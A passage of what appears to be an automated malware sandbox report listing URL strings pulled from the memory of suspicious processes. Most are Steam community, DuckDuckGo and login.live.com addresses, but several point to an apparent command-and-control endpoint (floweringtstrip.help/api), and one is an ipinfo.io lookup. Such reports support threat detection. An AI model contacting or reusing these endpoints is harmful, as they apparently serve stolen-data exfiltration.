Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.000000000176B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840883418.0000000001769000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.0000000000739000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=kDTcDpKW
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.000000000176B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840883418.0000000001769000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.0000000000739000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=ib5r
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=CFgKk306m7Mu&l=e
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/steam_share_image.jpg
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=zmDGj_EEgAlZ&am
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.j
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: KbSwZup.exe, 0000001C.00000003.3172342088.0000000005A0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: cbf2b6294a.exe, 00000019.00000003.3029634128.0000000000B9B000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3172342088.0000000005A0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: b7b5e2e140.exe, 0000000D.00000000.2704527883.0000000000EE4000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://developers.google.com/protocol-buffers/docs/reference/go/faq#namespace-conflictinvalid
Source: cbf2b6294a.exe, 00000019.00000003.2994536599.0000000005618000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994423825.0000000005618000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994343064.000000000561B000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133246728.00000000059BD000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133387973.00000000059BA000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133599716.00000000059BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cbf2b6294a.exe, 00000019.00000003.2994536599.0000000005618000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994423825.0000000005618000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994343064.000000000561B000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133246728.00000000059BD000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133387973.00000000059BA000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133599716.00000000059BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cbf2b6294a.exe, 00000019.00000003.2994536599.0000000005618000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994423825.0000000005618000.00000004.00000800.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.2994343064.000000000561B000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133246728.00000000059BD000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133387973.00000000059BA000.00000004.00000800.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3133599716.00000000059BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000002.2876054094.0000000001749000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854374146.000000000177B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://floweringtstrip.help/
Source: b4fe2af6b4.exe, 00000016.00000002.2876054094.0000000001749000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://floweringtstrip.help/C:
Source: b4fe2af6b4.exe, 00000016.00000003.2854374146.000000000177B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://floweringtstrip.help/api
Source: b4fe2af6b4.exe, 00000016.00000002.2876054094.000000000177B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://floweringtstrip.help/api)
Source: b4fe2af6b4.exe, 00000016.00000003.2875119965.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000002.2876515445.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2875039832.00000000017C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://floweringtstrip.help/apiEM
Source: b4fe2af6b4.exe, 00000016.00000002.2876054094.000000000177B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://floweringtstrip.help/apix
Source: b4fe2af6b4.exe, 00000016.00000003.2847743530.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://floweringtstrip.help/apiz
Source: b4fe2af6b4.exe, 00000016.00000002.2876054094.000000000177B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://floweringtstrip.help/api~
Source: b4fe2af6b4.exe, 00000016.00000002.2876054094.0000000001749000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://floweringtstrip.help/ef
Source: b4fe2af6b4.exe, 00000016.00000002.2876054094.0000000001749000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://floweringtstrip.help/mi
Source: b4fe2af6b4.exe, 00000016.00000002.2876054094.0000000001749000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://floweringtstrip.help/u&
Source: b4fe2af6b4.exe, 00000016.00000003.2854374146.000000000177B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://floweringtstrip.help:443/apiw-form-urlencoded
Source: BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: b4fe2af6b4.exe, 00000016.00000003.2840805198.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854251484.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847621323.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117841493.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117104594.00000000007C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: KbSwZup.exe, 0000001C.00000003.3172342088.0000000005A0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: ViGgA8C.exe, 0000001F.00000002.3404364747.0000000000E12000.00000040.00000001.01000000.00000017.sdmp, ViGgA8C.exe, 0000001F.00000003.3230226352.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: svchost.exe, 0000000C.00000002.3413822390.000002707DE41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: svchost.exe, 0000000C.00000002.3415711340.000002707DEA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3406856541.000002707D081000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3404899887.000002707D013000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609941388.000002707D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610019472.000002707D940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ApproveSession.srf
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ApproveSession.srfp
Source: svchost.exe, 0000000C.00000002.3408969366.000002707D102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=8
Source: svchost.exe, 0000000C.00000003.2610633522.000002707D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000000C.00000003.2610633522.000002707D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609502993.000002707D952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610160943.000002707D96B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610160943.000002707D96B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610160943.000002707D96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609351170.000002707D92C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000000C.00000003.2609941388.000002707D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610019472.000002707D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609941388.000002707D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610019472.000002707D940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageApprover.srf
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageApprover.srfp
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610053919.000002707D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2609941388.000002707D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610019472.000002707D940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageLoginKeys.srf
Source: svchost.exe, 0000000C.00000002.3406080499.000002707D05F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3414245555.000002707DE5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3408969366.000002707D0E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 0000000C.00000003.2609941388.000002707D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610019472.000002707D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 0000000C.00000003.2609941388.000002707D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610019472.000002707D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 0000000C.00000003.2609941388.000002707D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2610019472.000002707D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getuserrealm.srf
Source: svchost.exe, 0000000C.00000002.3405717508.000002707D045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/pp
